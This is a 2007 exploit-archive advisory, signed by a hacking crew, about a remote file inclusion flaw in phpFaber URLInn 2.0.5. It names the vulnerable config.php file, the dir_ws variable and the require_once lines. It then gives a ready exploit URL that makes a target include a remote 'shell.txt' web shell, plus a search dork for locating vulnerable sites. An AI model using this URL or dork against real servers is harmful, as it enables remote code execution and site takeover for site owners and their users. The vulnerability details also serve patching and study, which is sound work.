[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : phpFaber URLInn 2.0.5 (dir_ws) Remote File Inclusion Vulnerability
# Published : 2007-10-30
# Author : BiNgZa
# Previous Title : miniBB 2.1 (table) Remote SQL Injection Vulnerability
# Next Title : PHP-AGTC membership system 1.1a Remote Add Admin Exploit
/
_ ) (( )) (
(@) /| ))_(( /|
|-| / | (/|/) / | (@)
| |--------------------/--|-voV---`|'/--Vov-|-----------------------|-|
|-| '^` (o o) '^` | |
| | `Y/' |-|
|-| | |
| | -=ShAd0w-CrEw=- |-|
|-| | |
| | |-|
|_|___________________________________________________________________| |
(@) l / / ( ( / l |-|
l / V V l (@)
l/ _) )_ I
` /'
`
----------------------------------------------
GrEeTs To -=sHaDoW sEcUrItY TeAm=- GrEeTs To
----------------------------------------------
A2J, iNs, The Pitbull, ICQBomber, str0ke
----------------------------------------------
BiG sHoUt OuT tO udplink.net
----------------------------------------------
Vulnerability Type: Remote File Inclusion
Vulnerable file: /phpFaber.URLInn.v2.0.5.PHP.NULL-DGT/phpfaber_urlinn_2_0_5/urlinn_includes/config.php
Exploit URL: http://localhost/path/urlinn_includes/config.php?dir_ws=http://localhost/shell.txt?
Method: get
Register_globals: On
Vulnerable variable: dir_ws
Line number: 78
Lines:
----------------------------------------------
require_once("$dir_ws/urlinn_includes/adodb/adodb.inc.php");
require_once("$dir_ws/urlinn_includes/smarty/Smarty.class.php");
require_once("$dir_ws/urlinn_includes/i_PageSelector.php");
----------------------------------------------
----------------------------------------------
FoUnD By BiNgZa AKA RaZor
----------------------------------------------
DoRk:Powered by phpFaber URLInn. Copyright ?? 2004-2006 phpFaber
----------------------------------------------
shadowcrew@hotmail.co.uk
----------------------------------------------
shadow.php0h.com
----------------------------------------------
# www.Syue.com [2007-10-30]